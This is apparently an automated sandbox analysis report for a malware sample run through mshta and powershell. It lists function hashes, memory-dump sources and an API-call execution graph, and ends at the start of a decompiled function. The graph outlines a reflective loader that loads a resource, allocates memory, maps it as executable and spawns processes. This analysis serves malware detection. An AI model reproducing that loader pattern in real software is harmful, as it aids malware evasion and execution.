                                                                                                                                  • Instruction Fuzzy Hash: 4D51D62072CA484FCB48EF1C8855A31F7D1FB5D700B4984FEE68AC7292DA24CCD58795
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 032F3124 Relevance: .2, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
                                                                                                                                  • Instruction ID: 34441f809d99657970ac4b97ed697120d760a86570f8913d3df47bbd29e64caa
                                                                                                                                  • Opcode Fuzzy Hash: 7dcec06461d0d0f479789482b32aa00092139ebbce81f1c196ed6ec1e637b43d
                                                                                                                                  • Instruction Fuzzy Hash: 4D51D62072CA484FCB48EF1C8855A31F7D1FB5D700B4984FEE68AC7292DA24CCD58795
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 032F331A Relevance: .0, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                                                  • Associated: 00000004.00000003.420105332.00000000032F0000.00000010.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction ID: 81e5fd303f9267598110430094e09b4fc0c196b9e48a312f389b92d135076b5b
                                                                                                                                  • Opcode Fuzzy Hash: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction Fuzzy Hash: CDD022A211C3C51FC322F2B9081906D7B90DD1618832900CB8A8BCF082C8968CC24322
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 032F331A Relevance: .0, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420130625.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_32f0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction ID: 81e5fd303f9267598110430094e09b4fc0c196b9e48a312f389b92d135076b5b
                                                                                                                                  • Opcode Fuzzy Hash: de45a0d7f0c23ec3e5b1af61340a9a2431dbe0a52fde01f123f9daa195b345c7
                                                                                                                                  • Instruction Fuzzy Hash: CDD022A211C3C51FC322F2B9081906D7B90DD1618832900CB8A8BCF082C8968CC24322
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031C0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000003.420180473.00000000031C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_3_31c0000_mshta.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction ID: 1bdbb8f919aa0df8f30cf0a032a7b6331ba1d32c6a8050987fc9bbd17722e82e
                                                                                                                                  • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Executed Functions

                                                                                                                                  Function 000007FF00260A21 Relevance: .3, Instructions: 325COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683294083.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 03ada217cc85396ad92bdce512c92f2ef59b762858a50d4c708783a3872caf13
                                                                                                                                  • Instruction ID: 9a76010e0533b9f9d4f1147c3aa874bf602ff4e82b5fbd4b11e9c003934484dd
                                                                                                                                  • Opcode Fuzzy Hash: 03ada217cc85396ad92bdce512c92f2ef59b762858a50d4c708783a3872caf13
                                                                                                                                  • Instruction Fuzzy Hash: 2971A611A0EBC64FE71357786C657A27FB09F17210B0E01EBE488CB0E3D9489989C362
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 000007FF00260903 Relevance: .1, Instructions: 131COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683294083.000007FF00260000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff00260000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b872ff5d8e320beff945d7ff078fcb637f60cf064f18bc4ed49a2fca04c40320
                                                                                                                                  • Instruction ID: a124356133797467016251b4128d1cd63680e12c6d99e9a6167872a1ea0cb72f
                                                                                                                                  • Opcode Fuzzy Hash: b872ff5d8e320beff945d7ff078fcb637f60cf064f18bc4ed49a2fca04c40320
                                                                                                                                  • Instruction Fuzzy Hash: F831202191E7C24FE713577858AA6A07FB09F17210B1E04EBD088CF0B3E95C898AD322
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:16.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                  Signature Coverage:21.9%
                                                                                                                                  Total number of Nodes:297
                                                                                                                                  Total number of Limit Nodes:23
                                                                                                                                  execution_graph 31846 10035042 TlsGetValue 31847 10035076 GetModuleHandleA 31846->31847 31848 10035055 31846->31848 31850 10035085 GetProcAddress 31847->31850 31851 1003509f 31847->31851 31848->31847 31849 1003505f TlsGetValue 31848->31849 31854 1003506a 31849->31854 31852 1003506e 31850->31852 31852->31851 31853 10035095 RtlEncodePointer 31852->31853 31853->31851 31854->31847 31854->31852 31855 10020c26 31858 10020c32 __EH_prolog3 31855->31858 31857 10020c80 31882 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31857->31882 31858->31857 31866 1002083b EnterCriticalSection 31858->31866 31880 100201f1 RaiseException __CxxThrowException@8 31858->31880 31881 1002094b TlsAlloc InitializeCriticalSection 31858->31881 31862 10020c8d 31863 10020c93 31862->31863 31864 10020ca6 ~_Task_impl 31862->31864 31883 100209ed 88 API calls 5 library calls 31863->31883 31871 1002085a 31866->31871 31867 10020916 _memset 31868 1002092a LeaveCriticalSection 31867->31868 31868->31858 31869 10020893 31884 10014460 31869->31884 31870 100208a8 GlobalHandle GlobalUnlock 31873 10014460 ctype 80 API calls 31870->31873 31871->31867 31871->31869 31871->31870 31875 100208c5 GlobalReAlloc 31873->31875 31876 100208cf 31875->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31867 31878->31879 31879->31877 31881->31858 31882->31862 31883->31864 31885 10014477 ctype 31884->31885 31886 1001448c GlobalAlloc 31885->31886 31888 10013ba0 80 API calls _DebugHeapAllocator 31885->31888 31886->31876 31888->31886 31889 10030d06 31890 10030d12 31889->31890 31891 10030d0d 31889->31891 31895 10030c10 31890->31895 31907 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31891->31907 31894 10030d23 31898 10030c1c ___BuildCatchObjectHelper 31895->31898 31896 10030c69 31905 10030cb9 ___BuildCatchObjectHelper 31896->31905 31962 100125c0 31896->31962 31898->31896 31898->31905 31908 10030a37 31898->31908 31901 10030c99 31903 10030a37 __CRT_INIT@12 165 API calls 31901->31903 31901->31905 31902 100125c0 ___DllMainCRTStartup 146 API calls 31904 10030c90 31902->31904 31903->31905 31906 10030a37 __CRT_INIT@12 165 API calls 31904->31906 31905->31894 31906->31901 31907->31890 31909 10030b61 31908->31909 31910 10030a4a GetProcessHeap HeapAlloc 31908->31910 31912 10030b67 31909->31912 31913 10030b9c 31909->31913 31911 10030a6e GetVersionExA 31910->31911 31926 10030a67 31910->31926 31914 10030a89 GetProcessHeap HeapFree 31911->31914 31915 10030a7e GetProcessHeap HeapFree 31911->31915 31920 10030b86 31912->31920 31912->31926 32010 100310be 67 API calls _doexit 31912->32010 31916 10030ba1 31913->31916 31917 10030bfa 31913->31917 31918 10030ab5 31914->31918 31915->31926 31994 10035135 6 API calls __decode_pointer 31916->31994 31917->31926 32029 10035425 79 API calls 2 library calls 31917->32029 31984 10036624 HeapCreate 31918->31984 31920->31926 32011 100389ee 68 API calls __output_l 31920->32011 31921 10030ba6 31995 10035840 31921->31995 31926->31896 31927 10030aeb 31927->31926 31930 10030af4 31927->31930 32001 1003548e 78 API calls 6 library calls 31930->32001 31931 10030b90 32012 10035178 70 API calls 2 library calls 31931->32012 31932 10030bbe 32014 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31932->32014 31936 10030af9 __RTC_Initialize 31940 10030b0c GetCommandLineA 31936->31940 31954 10030afd 31936->31954 31937 10030b95 32013 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31937->32013 32003 10038d66 77 API calls 3 library calls 31940->32003 31941 10030bd0 31943 10030bd7 31941->31943 31944 10030bee 31941->31944 32015 100351b5 67 API calls 4 library calls 31943->32015 32016 1002fa69 31944->32016 31946 10030b1c 32004 100387ae 72 API calls 3 library calls 31946->32004 31949 10030bde GetCurrentThreadId 31949->31926 31950 10030b26 31951 10030b2a 31950->31951 32006 10038cad 111 API calls 3 library calls 31950->32006 32005 10035178 70 API calls 2 library calls 31951->32005 32002 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31954->32002 31955 10030b36 31956 10030b4a 31955->31956 32007 10038a3a 110 API calls 6 library calls 31955->32007 31961 10030b02 31956->31961 32009 100389ee 68 API calls __output_l 31956->32009 31959 10030b3f 31959->31956 32008 10030f4d 75 API calls 4 library calls 31959->32008 31961->31926 32055 10006a90 31962->32055 31965 1001265a 32089 1002fe65 105 API calls 5 library calls 31965->32089 31966 1001261c FindResourceW LoadResource SizeofResource 31969 10006a90 ___DllMainCRTStartup 67 API calls 31966->31969 31972 10012744 ___DllMainCRTStartup 31969->31972 31971 1001284d 31971->31901 31971->31902 31973 100127b7 VirtualAlloc 31972->31973 31974 1001279b VirtualAllocExNuma 31972->31974 31975 100127da 31973->31975 31974->31975 32060 1002fb00 31975->32060 31979 100127fa 32083 10002970 31979->32083 31981 10012810 ___DllMainCRTStartup 32086 100026a0 31981->32086 31983 10012664 32090 1002f81e 5 API calls __invoke_watson 31983->32090 31985 10036647 31984->31985 31986 10036644 31984->31986 32030 100365c9 67 API calls 3 library calls 31985->32030 31986->31927 31988 1003664c 31989 10036656 31988->31989 31990 1003667a 31988->31990 32031 10035aca HeapAlloc 31989->32031 31990->31927 31992 10036660 31992->31990 31993 10036665 HeapDestroy 31992->31993 31993->31986 31994->31921 31996 10035844 31995->31996 31998 10030bb2 31996->31998 31999 10035864 Sleep 31996->31999 32032 10030678 31996->32032 31998->31926 31998->31932 32000 10035879 31999->32000 32000->31996 32000->31998 32001->31936 32002->31961 32003->31946 32004->31950 32005->31954 32006->31955 32007->31959 32008->31956 32009->31951 32010->31920 32011->31931 32012->31937 32013->31926 32014->31941 32015->31949 32017 1002fa75 ___BuildCatchObjectHelper 32016->32017 32018 1002fab4 32017->32018 32019 1002faee __expand ___BuildCatchObjectHelper 32017->32019 32051 10035a99 67 API calls 2 library calls 32017->32051 32018->32019 32020 1002fac9 HeapFree 32018->32020 32019->31961 32020->32019 32022 1002fadb 32020->32022 32054 100311f4 67 API calls __getptd_noexit 32022->32054 32024 1002fae0 GetLastError 32024->32019 32025 1002faa6 32053 1002fabf LeaveCriticalSection _doexit 32025->32053 32026 1002fa8c ___sbh_find_block 32026->32025 32052 10035b3d VirtualFree VirtualFree HeapFree ___BuildCatchObjectHelper 32026->32052 32029->31926 32030->31988 32031->31992 32033 10030684 ___BuildCatchObjectHelper 32032->32033 32034 1003069c 32033->32034 32044 100306bb _memset 32033->32044 32045 100311f4 67 API calls __getptd_noexit 32034->32045 32036 100306a1 32046 10037753 4 API calls 2 library calls 32036->32046 32037 100306b1 ___BuildCatchObjectHelper 32037->31996 32039 1003072d RtlAllocateHeap 32039->32044 32044->32037 32044->32039 32047 10035a99 67 API calls 2 library calls 32044->32047 32048 100362e6 5 API calls 2 library calls 32044->32048 32049 10030774 LeaveCriticalSection _doexit 32044->32049 32050 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32044->32050 32045->32036 32047->32044 32048->32044 32049->32044 32050->32044 32051->32026 32052->32025 32053->32018 32054->32024 32056 1002f9a6 _malloc 67 API calls 32055->32056 32058 10006aa1 32056->32058 32057 10006aad 32057->31965 32057->31966 32058->32057 32059 1002fa69 __output_l 67 API calls 32058->32059 32059->32057 32061 1002fb18 32060->32061 32062 1002fb3f __VEC_memcpy 32061->32062 32063 100127eb 32061->32063 32062->32063 32064 1002f9a6 32063->32064 32065 1002fa53 32064->32065 32076 1002f9b4 32064->32076 32098 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32065->32098 32067 1002fa59 32099 100311f4 67 API calls __getptd_noexit 32067->32099 32070 1002fa5f 32070->31979 32073 1002fa17 RtlAllocateHeap 32073->32076 32074 1002f9c9 32074->32076 32091 10036892 67 API calls 2 library calls 32074->32091 32092 100366f2 67 API calls 7 library calls 32074->32092 32093 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32074->32093 32076->32073 32076->32074 32077 1002fa4a 32076->32077 32078 1002fa3e 32076->32078 32081 1002fa3c 32076->32081 32094 1002f957 67 API calls 4 library calls 32076->32094 32095 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32076->32095 32077->31979 32096 100311f4 67 API calls __getptd_noexit 32078->32096 32097 100311f4 67 API calls __getptd_noexit 32081->32097 32084 1002f9a6 _malloc 67 API calls 32083->32084 32085 10002990 32084->32085 32085->31981 32100 10002280 32086->32100 32089->31983 32090->31971 32091->32074 32092->32074 32094->32076 32095->32076 32096->32081 32097->32077 32098->32067 32099->32070 32137 10001990 32100->32137 32103 100022c3 SetLastError 32134 100022a9 32103->32134 32104 100022d5 32105 10001990 ___DllMainCRTStartup SetLastError 32104->32105 32106 100022ee 32105->32106 32107 10002310 SetLastError 32106->32107 32108 10002322 32106->32108 32106->32134 32107->32134 32109 10002331 SetLastError 32108->32109 32110 10002343 32108->32110 32109->32134 32111 1000234e SetLastError 32110->32111 32113 10002360 GetNativeSystemInfo 32110->32113 32111->32134 32114 10002414 SetLastError 32113->32114 32115 10002426 VirtualAlloc 32113->32115 32114->32134 32116 10002472 GetProcessHeap HeapAlloc 32115->32116 32117 10002447 VirtualAlloc 32115->32117 32119 100024ac 32116->32119 32120 1000248c VirtualFree SetLastError 32116->32120 32117->32116 32118 10002463 SetLastError 32117->32118 32118->32134 32121 10001990 ___DllMainCRTStartup SetLastError 32119->32121 32120->32134 32122 1000250e 32121->32122 32123 10002512 32122->32123 32124 1000251c VirtualAlloc 32122->32124 32175 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32123->32175 32125 1000254b ___DllMainCRTStartup 32124->32125 32140 100019c0 32125->32140 32128 1000257f ___DllMainCRTStartup 32128->32123 32150 10001ff0 32128->32150 32132 100025e8 ___DllMainCRTStartup 32132->32123 32132->32134 32169 2de991 32132->32169 32134->31983 32135 1000264f SetLastError 32135->32123 32138 100019ab 32137->32138 32139 1000199f SetLastError 32137->32139 32138->32103 32138->32104 32138->32134 32139->32138 32141 100019f0 32140->32141 32142 10001a83 32141->32142 32144 10001a2c VirtualAlloc 32141->32144 32149 10001aa0 ___DllMainCRTStartup 32141->32149 32143 10001990 ___DllMainCRTStartup SetLastError 32142->32143 32145 10001a9c 32143->32145 32146 10001a50 32144->32146 32147 10001a57 ___DllMainCRTStartup 32144->32147 32148 10001aa4 VirtualAlloc 32145->32148 32145->32149 32146->32149 32147->32141 32148->32149 32149->32128 32151 10002029 IsBadReadPtr 32150->32151 32160 1000201f 32150->32160 32153 10002053 32151->32153 32151->32160 32154 10002085 SetLastError 32153->32154 32155 10002099 32153->32155 32153->32160 32154->32160 32176 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32155->32176 32157 100020b3 32158 100020bf SetLastError 32157->32158 32162 100020e9 32157->32162 32158->32160 32160->32123 32163 10001cb0 32160->32163 32161 100021f9 SetLastError 32161->32160 32162->32160 32162->32161 32164 10001cf8 ___DllMainCRTStartup 32163->32164 32165 10001e01 32164->32165 32167 10001ddd 32164->32167 32177 10001b80 32164->32177 32166 10001b80 ___DllMainCRTStartup 2 API calls 32165->32166 32166->32167 32167->32132 32170 2dea62 32169->32170 32174 2dea8d 32169->32174 32184 2df8fd 32170->32184 32174->32134 32174->32135 32175->32134 32176->32157 32178 10001b9c 32177->32178 32179 10001b92 32177->32179 32181 10001c04 VirtualProtect 32178->32181 32182 10001baa 32178->32182 32179->32164 32181->32179 32182->32179 32183 10001be2 VirtualFree 32182->32183 32183->32179 32190 2dfde0 32184->32190 32185 2dffd1 32208 2dab87 32185->32208 32188 2dea75 32188->32174 32197 2d93ed 32188->32197 32190->32185 32190->32188 32194 2edcf7 GetPEB 32190->32194 32195 2da8b0 GetPEB 32190->32195 32200 2db23c 32190->32200 32204 2e46bb 32190->32204 32218 2eda22 GetPEB 32190->32218 32219 2d47ce GetPEB 32190->32219 32220 2df899 GetPEB 32190->32220 32221 2d4b61 32190->32221 32194->32190 32195->32190 32198 2eaa30 GetPEB 32197->32198 32199 2d9456 ExitProcess 32198->32199 32199->32174 32201 2db254 32200->32201 32225 2eaa30 32201->32225 32205 2e46da 32204->32205 32206 2eaa30 GetPEB 32205->32206 32207 2e4729 SHGetFolderPathW 32206->32207 32207->32190 32209 2dabb0 32208->32209 32210 2d4b61 GetPEB 32209->32210 32211 2dad67 32210->32211 32233 2d7f5d 32211->32233 32213 2dad99 32214 2dada4 32213->32214 32237 2e1e67 GetPEB 32213->32237 32214->32188 32216 2dadc4 32238 2e1e67 GetPEB 32216->32238 32218->32190 32219->32190 32220->32190 32222 2d4b74 32221->32222 32239 2d1ea7 32222->32239 32226 2eab1d 32225->32226 32227 2db2b8 lstrcmpiW 32225->32227 32231 2e0a0e GetPEB 32226->32231 32227->32190 32229 2eab33 32232 2dcdcd GetPEB 32229->32232 32231->32229 32232->32227 32234 2d7f8e 32233->32234 32235 2eaa30 GetPEB 32234->32235 32236 2d7fd4 CreateProcessW 32235->32236 32236->32213 32237->32216 32238->32214 32240 2d1ebc 32239->32240 32243 2d702c 32240->32243 32244 2d7049 32243->32244 32245 2eaa30 GetPEB 32244->32245 32246 2d1f4c 32245->32246 32246->32190

                                                                                                                                  Executed Functions

                                                                                                                                  Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
